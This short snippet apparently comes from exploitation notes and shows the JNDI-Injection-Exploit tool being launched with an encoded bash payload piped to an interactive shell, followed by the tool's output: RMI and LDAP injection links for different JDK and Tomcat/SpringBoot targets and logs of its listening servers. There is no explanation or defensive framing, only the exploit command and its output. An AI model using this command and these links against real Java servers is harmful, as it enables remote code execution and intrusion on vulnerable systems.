java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,<base64>}|{base64,-d}|{bash,-i}" -A <ip>
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
[ADDRESS] >> 127.0.0.1 [COMMAND] >> bash -c {echo,<base64>}|{base64,-d}|{bash,-i} ----------------------------JNDI Links---------------------------- Target environment(Build in JDK 1.8 whose trustURLCodebase is true): rmi://127.0.0.1:1099/xxxxxx ldap://127.0.0.1:1389/xxxxxx Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath): rmi://127.0.0.1:1099/xxxxxx Target environment(Build in JDK 1.7 whose trustURLCodebase is true): rmi://127.0.0.1:1099/xxxxxx ldap://127.0.0.1:1389/xxxxxx
----------------------------Server Log---------------------------- 2024-06-20 11:29:04 [JETTYSERVER]>> Listening on 0.0.0.0:8180 2024-06-20 11:29:04 [RMISERVER] >> Listening on 0.0.0.0:1099 2024-06-20 11:29:04 [LDAPSERVER] >> Listening on 0.0.0.0:1389